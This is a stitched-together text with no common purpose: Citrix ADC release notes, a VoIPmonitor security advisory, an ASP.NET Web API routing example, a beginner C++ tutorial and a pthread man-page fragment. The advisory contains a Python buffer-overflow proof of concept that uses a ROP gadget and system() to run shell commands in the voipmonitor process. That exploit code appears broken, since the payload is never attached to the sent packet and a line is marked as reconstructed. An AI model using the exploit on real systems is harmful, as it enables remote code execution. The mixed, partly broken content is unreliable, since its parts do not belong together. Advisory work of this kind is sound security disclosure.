The AppFlow records generated by the Citrix ADC appliance now include the responder response-related information.[ NSBASE-10634 ]
Support for larger HTTP header size
Citrix ADC appliance can now handle a large header size HTTP requests to accommodate the L7 application request. The header size of an HTTP request is increased to 128 KB.[ NSBASE-7957 ]
Fixed Issues
Authentication, authorization, and auditing
In some cases, after the user password is changed, the following error message appears, Cannot complete your request.
The error occurs because the modified password is corrupted after encryption.[ NSHELP-25437 ]
In some cases, when Citrix ADC is used as an IdP to Citrix Cloud, the authentication, authorization, and auditing daemon (aaad) crashes while performing nested group extraction activity in AD because of a memory buffer overflow.[ NSHELP-24884 ]
LDAP authentication fails in a Citrix ADC appliance when a user's group length exceeds the defined limit.[ NSHELP-24373 ]
When trying to log on to the Citrix Gateway appliance, a user does not see a response if the log on attempt fails.[ NSHELP-23155 ]
The configuration of the non-addressable authentication virtual server is not restored after a reboot if the following conditions are met:
[ NSAUTH-9263 ]
- The Citrix ADC appliance has a Standard edition license
- The appliance is configured for nFactor authentication using Citrix Gateway
Caching
A Citrix ADC appliance might randomly crash if the following conditions are observed:
- Integrated caching feature is enabled.
- 100 GB or more memory is allocated for integrated caching.
Allocate less than 100 GB of memory.[ NSHELP-20854 ]
CallHome
On the Citrix ADC MPX 22000 platform, the show techsupport command incorrectly shows that the hard drive is not mounted.[ NSHELP-24223 ]
Citrix ADC SDX Appliance
The Citrix ADC SDX appliance upgrade fails if the Citrix Hypervisor consumes more than 90% of the disk space.[ NSHELP-24873 ]
Citrix Gateway
In rare cases, the Citrix Gateway appliance might crash during session synchronization with the secondary appliance or during Intranet IP assignment.[ NSHELP-25221 ]
The UrlName parameter is appended to the session and other policy bindings when a classic VPN URL is also bound, leading to configuration addition on save and reboot.[ NSHELP-25072 ]
The Citrix Gateway IIP registration fails if Split DNS is set to "Both" or "Local".[ NSHELP-24928 ]
If ICA smart policy is enabled and there is some residual AppFlow configuration, you might observe a high latency connection.[ NSHELP-24908 ]
The Citrix ADC appliance might crash when UDP audio is enabled and the internal malloc system call returns an error.[ NSHELP-24890 ]
In rare cases, a Citrix Gateway appliance crashes when the syslog transport type is modified due to a memory corruption.[ NSHELP-24794 ]
The Citrix Gateway appliance does not extract the common-name from UTF8String encoded device certificates.[ NSHELP-24741 ]
The Citrix Gateway appliance crashes on removal of an intranet app whose hostName value exceeds 160 characters.[ NSHELP-24524 ]
If location detection is enabled, the Always On VPN's machine level tunnel takes a long time to get established after the client machine is restarted.[ NSHELP-24508 ]
The Citrix ADC appliance might crash when configured for clientless VPN.[ NSHELP-24430 ]
The Citrix Gateway appliance might reboot if the RDP server profile bound to the VPN virtual server does not have the RDP IP address configured and the same port is used by the RDP server profile and the VPN virtual server.[ NSHELP-24199 ]
A Citrix Gateway appliance might go down in an EDT proxy deployment if the "kill icaconnection" command is run while an EDT connection establishment is in progress.[ NSHELP-23882 ]
The Windows plug-in displays the Gateway not reachable message if the client machine has multiple instances of the Hyper-V and WiFi direct access virtual adapters.[ NSHELP-23794 ]
A Citrix Gateway appliance might crash when trying to parse an incoming packet.[ NSHELP-23747 ]
The Citrix Gateway appliance crashes when using UDP audio while accessing the Virtual Desktop.
Use EDT audio instead of UDP audio.[ NSHELP-23514 ]
The UDP/ICMP/DNS based authorization policy denials for VPN do not show up in the ns.log file.[ NSHELP-23410 ]
The Citrix ADC appliance might crash during failover if UDP audio is enabled.[ NSHELP-22850 ]
Citrix Web App Firewall
Communication errors are observed in aslearn when you reset the Citrix Web App Firewall learning data in a cluster configuration.[ NSWAF-6768 ]
In a cluster configuration, the Web Services Interoperability (WSI) Check value with space is considered as an invalid input although it is valid in a Citrix ADC core appliance.[ NSWAF-6745 ]
The default credit card name configuration details for basic or advanced Web App Firewall profiles are missing in a cluster deployment.[ NSWAF-6675 ]
The default XML DOS binding for default Web App Firewall advanced profile is missing in a cluster deployment.[ NSWAF-6672 ]
In a cluster configuration, unable to bind the "safeobject" rule with a "safeobject" expression length of more than 255 characters.[ NSWAF-6670 ]
The default value for "FileUploadTypesAction" configuration for basic or advanced Web App Firewall profile is missing in a cluster deployment.[ NSWAF-6669 ]
Incorrect default "CMDInjectionAction" configuration is observed for Web App Firewall basic or advanced profile in a cluster deployment.[ NSWAF-6668 ]
A Citrix ADC cluster setup might crash if there are DHT transport errors between the cluster nodes, and the field consistency protection feature is enabled.[ NSWAF-6560 ]
The Citrix Web App Firewall cookie consistency check removes the SameSite cookie attribute in the response sent by the back-end server.[ NSHELP-24313 ]
Load Balancing
When a GSLB deployment uses the round trip time (RTT) method for load balance, the Citrix ADC appliance might fail if you delete or unbind a GSLB service during the traffic flow.[ NSHELP-24425 ]
The Citrix ADC appliance might crash if the association between Distributed Hash Table (DHT) entry and persistence session is deleted while freeing up the persistence session.[ NSHELP-24213 ]
Feature: Load Balancing
If a service group member is assigned a wildcard port (port *), the monitor details for that service group member can be viewed from the Monitor Details page.[ NSHELP-9409 ]
Networking
In a Citrix ADC BLX or Citrix ADC CPX appliance, installing OSPF or BGP routes to the appliance's routing table might fail.[ NSNET-18707 ]
RNAT with "useproxyport" disabled might not work as expected for source ports numbered lower than 1024.[ NSHELP-25162 ]
In a high availability setup with INC mode, any RNAT rule that has a VIP address set as the NAT IP address is removed during HA synchronization.[ NSHELP-24893 ]
Loading the Citrix ADC SNMP MIB to an SNMP manager might fail because of the presence of a duplicate object name "urlfiltDbUpdateStatus" in the SNMP MIB. The same object name "urlfiltDbUpdateStatus" is used for an SNMP trap and an SNMP trap variable binding.
With the fix, the "urlfiltDbUpdateStatus" SNMP trap variable binding is changed to "urlFilterDbUpdateStatus".[ NSHELP-24778 ]
A Citrix ADC appliance might crash because of an internal memory synchronization issue in the LSN module.[ NSHELP-24623 ]
IPv6 policy based routes (PBR6) on a Citrix ADC appliance might not work as expected.[ NSHELP-23161 ]
In a high availability setup, one of the Citrix ADC appliances might crash if you perform In Service Software Upgrade (ISSU) from Citrix ADC software version 13.0 47.24 or previous, to a later version.[ NSHELP-21701 ]
Platform
The Citrix ADC MPX 8000-1G platform supports pooled licensing.[ NSPLAT-17354 ]
While upgrading a Citrix ADC SDX appliance, if an SSD fails during one of the many reboots, the corresponding RAID pair volume becomes inactive after the appliance reboots. You can observe the following:
The volume appears as "not created" in the GUI.
The failed SSD slot is reported as "not present."
The corresponding VPX-SR also shows up as degraded.
As a result, ADC instances residing on the VPX-SR might not boot or remain in a halted state.[ NSHELP-24751 ]
Feature: Platform
When multiple LA channels are configured on an SDX appliance without any management interfaces (0/1, 0/2) and if the first LA channel is disabled through the VPX CLI, the VPX appliance might be unreachable.
[ NSHELP-21889 ]
Feature: Citrix ADC SDX appliance
On the ADC SDX 14000 and 15000 appliances, traffic loss of up to 9 seconds is observed if the following conditions are met:
[ NSHELP-21875 ]
- 10G ports are connected using the LA channel to two Cisco switches that are configured in VPC setup as active or passive
- The link to active or primary Cisco switch bounces.
Policies
A Citrix ADC appliance might crash if global scope variables are used in invalid HTTP requests.[ NSHELP-25369 ]
A Citrix ADC MPX/SDX 11542, MPX/SDX 14000, MPX 22000/24000/25000, or MPX/SDX 14000 FIPS appliance might crash if the following conditions are met:
[ NSHELP-24405 ]
- ECDHE/ECDSA hybrid model is enabled.
- DTLS traffic is received when the CPU utilization is already high.
A Citrix ADC appliance might not propose ECDHE ciphers in the client hello message if the following conditions are met:
[ NSHELP-24355 ]
- HA synchronization is in progress.
- Monitor probes are sent before the synchronization is complete.
The Citrix ADC appliance crashes if NULL or RC2 ciphers are used by the SSL backend service on the following platforms:
[ NSHELP-24308 ]
- MPX 5900
- MPX 8900
- MPX 15000
- MPX 15000-50G
- MPX 26000
- MPX 26000-50S
- MPX 26000-100G
A Citrix ADC appliance might crash when configuring a DTLS virtual server if the appliance is low on disk space.[ NSHELP-24201 ]
System
A Citrix ADC appliance might crash because of memory corruption when the HTTP/2 feature is enabled.[ NSHELP-25005 ]
In a cluster setup, the validation of default values in surge protection is handled differently on the database and packet engine.[ NSHELP-24455 ]
The analytics records are not sent to the Citrix ADM if the following conditions are observed:
- IPFIX collector is configured in the admin partition of the Citrix ADC appliance.
- The collector is in a subnet other than the SNIP address.[ NSHELP-24283 ]
High CPU usage is observed in the Citrix ADC web logging (NSWL) client running on a Linux platform if the polling interval is not set properly.[ NSHELP-24266 ]
Add a database reference count to the TCP profile.
A Citrix ADC appliance might crash if the following conditions are observed:
[ NSHELP-21202 ]
- HTTP/2 enabled in the HTTP profile bound to load balancing virtual server of type HTTP/SSL or service.
- Connection multiplexing option disabled in the HTTP Profile bound to load balancing virtual server or service.
Feature: AppFlow
A Citrix ADC appliance with connection chaining and SSL enabled might send more data than the MTU.[ NSHELP-9411 ]
Enabling metrics collector in the default partition might fail if it is already enabled in the admin partition setup.
Do not enable metrics collector in the admin partition setup.[ NSBASE-12623 ]
User Interface
The diff ns config command displays an ERROR: Failed to get UID for command: apply ns pbr6 error message. It happens when the apply ns pbr6 command is saved in ns.conf or running-config files.[ NSHELP-25373 ]
In a cluster setup, unwanted extra binding configuration gets saved in the ns.conf file.[ NSHELP-24636 ]
The following error conditions are observed in the Citrix Gateway GUI:
[ NSHELP-24494 ]
- When a policy is bound to primary authentication in the VPN virtual server, the GUI incorrectly shows that the policy is bound to the secondary authentication and the group authentication.
- When the VPN virtual server is bound to a server certificate, the server GUI incorrectly shows that the VPN virtual server is bound to CA cert as well.
On a Citrix ADC SDX platform, the following error message appears while loading the GUI:
Operation not supported by device [Pooled licensing not supported on this platform][ NSHELP-24474 ]
On the Citrix ADC GUI, you are unable to view the "Custom Reports" created for a specific partition.[ NSHELP-24370 ]
The following temporary files present in the /var/tmp folder of a Citrix ADC appliance are causing a memory full state.
[ NSHELP-24092 ]
- sh.runn.audit.<pid> file created by nsconfigaudit tool.
- tmp_ns.conf.<pid> file created by show run command for partition.
For a "routerdynamicrouting" NITRO API request, the Citrix ADC appliance might return JSON data with formatting errors if the response size is large.[ NSHELP-19913 ]
Feature: System
A Citrix ADC appliance becomes unstable if you use the -outfilename parameter in the diffnsconfig command. As a result, the diffnsconfig output can be large enough to completely fill the root disk.[ NSHELP-19345 ]
Known Issues
Authentication, authorization, and auditing
In some cases, a Citrix ADC appliance crashes when a user tries to configure a customized EULA login schema.
Use the default EULA login schema.[ NSHELP-25570 ]
If a Citrix ADC appliance is configured for nFactor authentication and is upgraded to version 13.0, the endpoint (for example, an iPad) used to access the Citrix ADC appliance is presented with 401-based authentication instead of form-based authentication.[ NSHELP-25309 ]
Feature: Authentication, authorization, and auditing-TM
A Citrix ADC appliance does not authenticate duplicate password login attempts and prevents account lockouts.[ NSHELP-563 ]
A Citrix ADC appliance responds with a 400 error code when the header size of a Citrix Gateway user interface related request exceeds 1024 characters.[ NSAUTH-9475 ]
Feature: Authentication, authorization, and auditing
The DualAuthPushOrOTP.xml LoginSchema is not appearing properly in the login schema editor screen of Citrix ADC GUI.[ NSAUTH-6106 ]
Feature: Authentication, authorization, and auditing
ADFS proxy profile can be configured in a cluster deployment. The status for a proxy profile is incorrectly displayed as blank upon issuing the following command.
"show adfsproxyprofile <profile name>"
Connect to the primary active Citrix ADC in the cluster and run the "show adfsproxyprofile <profile name>" command. It would display the proxy profile status.[ NSAUTH-5916 ]
Feature: Authentication, authorization, and auditing
If an FQDN is used for configuring wiHome or StoreFront over an SSL connection, ECDHE ciphers are not negotiated during the boot-up process.[ NSHELP-25144 ]
EPA plug-in for Windows does not use the local machine's configured proxy and connects directly to the gateway server.[ NSHELP-24848 ]
Feature: Citrix Gateway
A Citrix Gateway appliance does not fallback to the LDAP policy if the following conditions are met:
[ NSHELP-1853 ]
- Certificate authentication and LDAP are configured as the first factor and LDAP checks data from login Schema.
- The certificate authentication fails.
A memory leak is observed if HDX Insight with advanced encryption is enabled.
Use HDX Insight with basic encryption instead of advanced encryption.[ CGOP-15689 ]
Transfer Logon does not work if the following two conditions are met:
[ CGOP-14092 ]
- nFactor authentication is configured.
- Citrix ADC theme is set to Default.
Feature: Citrix Gateway
The Gateway Insight report incorrectly displays the value "Local" instead of "SAML" in the Authentication Type field for SAML error failures.[ CGOP-13584 ]
Feature: Citrix Gateway
The ICA connection results in a skip parse during ICA parsing if users are using the Mac receiver along with version 6.5 of Citrix Virtual Apps and Desktops (formerly Citrix XenApp and XenDesktop).
Upgrade the receiver to the latest version of Citrix Workspace app.[ CGOP-13532 ]
Feature: Citrix Gateway
[ NSWAF-22 ]
- Request URL
- Source IP address
- Source
Synchronization of configuration from the master site to subordinate sites fails.[ NSHELP-23391 ]
A Citrix ADC appliance might crash when DNS logging is enabled and a malformed DNS query is received.[ NSHELP-21959 ]
Networking
When you push configurations to the cluster instances using a StyleBook, the commands fail with the "Command propagation failed" error message.
On successive failures, the cluster retains the partial configuration.
1. Identify the failed commands from the log.
2. Manually apply the recovery commands for the failed commands.[ NSHELP-24910 ]
In a high availability setup, the SNMP module might crash repeatedly because of improper handling of data by the packet engines and internal networking modules.
This repeated crash of the SNMP module triggers HA failover.[ NSHELP-24434 ]
Feature: Citrix ADC SDX platform
Support for new Citrix ADC SDX hardware platforms
This release now supports the following new platforms:
[ NSPLAT-12815 ]
- Citrix ADC SDX 15000. For more information, see
- Citrix ADC SDX 26000. For more information, see
- Citrix ADC SDX 26000-50S. For more information, see
[From Build 51.10]
On the Citrix ADC SDX 14000 and SDX 25000 platforms, a core dump is not generated through the lights out management Non-Maskable Interrupt (NMI) button.[ NSHELP-25091 ]
Policies
Feature: System
Connections might hang if the size of the data being processed is more than the configured default TCP buffer size.
Set the TCP buffer size to the maximum size of data that needs to be processed.[ NSPOLICY-1267 ]
SSL
Feature: SSL
Update command is not available for the following add commands:
[ NSSSL-6484 ]
- add azure application
- add azure keyvault
- add ssl certkey with hsmkey option
Feature: SSL
You cannot add an Azure Key Vault object if an authentication Azure Key Vault object is already added.[ NSSSL-6478 ]
Feature: SSL
You can create multiple Azure Application entities with the same client ID and client secret. The Citrix ADC appliance does not return an error.[ NSSSL-6213 ]
Feature: SSL
The following incorrect error message appears when you remove an HSM key without specifying KEYVAULT as the HSM type.
ERROR: crl refresh disabled[ NSSSL-6106 ]
Feature: SSL
Session Key Auto Refresh incorrectly appears as disabled on a cluster IP address. (This option cannot be disabled.)[ NSSSL-4427 ]
Feature: SSL
An incorrect warning message, "Warning: No usable ciphers configured on the SSL vserver/service," appears if you try to change the SSL protocol or cipher in the SSL profile.[ NSSSL-4001 ]
Feature: SSL
In a cluster setup, the running configuration on the cluster IP (CLIP) address shows the DEFAULT_BACKEND cipher group bound to entities, whereas it is missing on nodes. This is a display issue.[ NSHELP-13466 ]
System
A Citrix ADC appliance is unable to handle server-side connections and cannot log correct AppFlow records if the following conditions are observed:
[ NSHELP-24824 ]
- The domain name which matches a private urlset is not obfuscated correctly from the AppFlow records.
- The Responder Action, Policy Matched, and Matched ID fields are incorrectly populated in the AppFlow records.
When Citrix ADC CPX is deployed as a sidecar and the environment variable MGMT_HTTP_PORT is not set, NITRO API calls do not work.
When you deploy Citrix ADC CPX as a sidecar, you must set the MGMT_HTTP_PORT environment variable. You can assign any unassigned port number, including 9080.[ NSBASE-12800 ]
User Interface
Feature: Cloudbridge connector
Create/Monitor CloudBridge Connector wizard might become unresponsive or fail to configure a CloudBridge connector. [-config <full path of the configuration file (ns.conf)>]
Static binaries provided for VoIPmonitor version 27.5 are built without any memory corruption protection in place.
# VoIPmonitor static builds are compiled without any standard memory corruption protection
- Fixed versions: N/A
- Enable Security Advisory:
- VoIPmonitor Security Advisory: none
- Tested vulnerable versions: 27.5
- Timeline:
- Report date: 2021-02-10 & 2021-02-13
- Enable Security advisory: 2021-03-15
## Description
The binaries available for download at <> are built without any memory corruption protection in place. The following is output from the tool `hardening-check`:
```
hardening-check!
```
When stack protection together with Fortify Source and other protection mechanisms are in place, exploitation of memory corruption vulnerabilities normally results in a program crash instead of leading to remote code execution. Most modern compilation systems create executable binaries with these features built-in by default. When these features are not used, attackers may easily exploit memory corruption vulnerabilities, such as buffer overflows, to run arbitrary code. In this advisory we will demonstrate how a buffer overflow reported in a separate advisory, could be abused to run arbitrary code because of the lack of standard memory corruption protection in the static build releases of VoIPmonitor.
The vendor has explained that:
> we are not going to enable the protection in the static builds as the speed is critical on many installations
> Our static build also uses tcmalloc (recommended version) which is required for high packet/second processing as the libc allocator is not fast enough especially on NUMA systems. For high packet/second traffic FORTIFY_SOURCE can introduce a lot of additional CPU cycles. If using custom builds with FORTIFY_SOURCE - they should compare if the sniffer did not introduced higher CPU usage.
While we understand the vendor's position, we are issuing an advisory to ensure that end users can make informed risk-based decisions.
## Impact
The lack of standard memory corruption protection mechanisms means that such vulnerabilities may lead to remote code execution.
## How to reproduce the issue
1. Execute the static build of VoIPmonitor (such as)
2. Start the live sniffer from the VOIPMonitor GUI or via the manager on port 5029
3. Execute the following Python program so that VOIPMonitor is able to capture the packet
4. Observe the payload being executed by the `voipmonitor` process, i.e. the following:
- current user is printed due to execution of the `whoami` command
- `h4x0r was here` is also printed
- a file has been created in `/tmp/woot`
```python
import struct
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
payload_size=32607
# Pad with As
payload = b'A' * 703
payload_size-=len(payload)
# Write system payload
cmd=b'whoami;echo "h4x0r was here";touch /tmp/woot\x00'
payload+=cmd
payload_size-=len(cmd)
# Pad some more so that we can overwrite the save_packet_sql's function return address
payload += b'A' * payload_size
# Call a ROP gadget that increments the value of the RDI register,
# which will now point to the value set by cmd
payload += struct.pack('<Q', 0x0000000000b222f1)
# Return to system() to execute the value in RDI
payload += struct.pack('<Q', 0xb22fd0)
# Return to exit() to exit gracefully
# (first line of the SIP message; reconstructed, the original line was lost)
msg = b'REGISTER sip:sip.example.org SIP/2.0\r\n'
msg+=b'Max-Forwards: 70\r\n'
msg+=b'From: <sip:[email protected]>;tag=mnq1nKGNZHNUkNOG\r\n'
msg+=b'To: <sip:[email protected]>\r\n'
msg+=b'Call-ID: 93X9dNZO2qdcfpdu\r\n'
msg+=b'CSeq: 1 REGISTER\r\n'
msg+=b'Contact: <sip:[email protected]:35393;transport=udp>\r\n'
msg+=b'Expires: 60\r\n'
msg+=b'Content-Length: 0\r\n'
msg+=b'\r\n'
s.sendto(msg, ('167.71.58.84', 5060))
```
## Solution and recommendations
Users who would like to have standard memory corruption protection for VoIPmonitor should compile the binaries themselves and apply their own upgrades rather than using the upgrade feature from the VoIPmonitor GUI / sensors page.
We recommended the following to the vendor:
> Our recommendation is that standard memory corruption protection be switched on by default in the official binary build of VoIPmonitor. If there are specific requirements for specific systems that require such features to be switched off, then additional binaries should be offered, with adequate documentation of the risks involved.
> Do note that memory corruption vulnerabilities should also be addressed and fixed even if security features, such as Fortify, are used.
## Acknowledgements
Enable Security would like to thank Martin Vit and the developers at VoIPmonitor for the very quick responses and explanations with regards to <>.
When you need a common portion of the route for all routes within a controller, the RoutePrefix attribute is used.
In the example below, the api/students part of the route is common, so we can define a RoutePrefix once and avoid repeating it.
[RoutePrefix("api/students")]
public class StudentController : ApiController
{
    [Route("")]
    public IEnumerable<Student> Get()
    {
        //action code goes here
    }

    [Route("{id:int}")]
    public Student Get(int id)
    {
        //action code goes here
    }

    [Route("")]
    public HttpResponseMessage Post(Student student)
    {
        //action code goes here
    }
}
Let's begin with a simple C++ program that displays a message.
The following code uses the C++ cout (pronounced "see-out") object to produce character output.
Source code comment lines begin with //, and the compiler ignores them.
C++ is case sensitive. It discriminates between uppercase characters and lowercase characters.
The cpp filename extension is a common way to indicate a C++ program.
#include <iostream>          // a PREPROCESSOR directive

int main()                   // function header
{                            // start of function body
    using namespace std;     // make definitions visible
    cout << "this is a test.";  // message
    cout << endl;            // start a new line
    cout << "hi!" << endl;   // more output
    return 0;                // terminate main()
}
The code above generates the following result.
To make the window stay open until you strike a key, add the following line of code before the return statement:
cin.get();
If you're used to programming in C, you might not know cout, but you do know the printf() function.
C++ can use printf(), scanf(), and all the other standard C input and output functions, provided that you include the usual C stdio.h file.
You construct C++ programs from building blocks called functions.
Typically, you organize a program into major tasks and then design separate functions to handle those tasks.
The example shown above is simple enough to consist of a single function named main().
The main() function is a good place to start, even though some features precede it, such as the preprocessor directive.
The sample program has the following fundamental structure:
int main()
{
    statements
    return 0;
}
The final statement in main(), called a return statement, terminates the function.
In C++, leaving the parentheses empty is the same as using void in the parentheses.
Some programmers use this header and omit the return statement:
void main()
pthread_rwlock_tryrdlock()
Attempt to acquire a shared lock on a read-write lock
Synopsis:
#include <pthread.h>

int pthread_rwlock_tryrdlock( pthread_rwlock_t* rwl );

Errors:
- EBUSY
- The read-write lock rwl is already exclusively locked.
- EDEADLK
- The calling thread already has an exclusive lock for rwl.
- EFAULT
- A fault occurred when the kernel tried to access rwl.
- EINVAL
- The read-write lock rwl is invalid.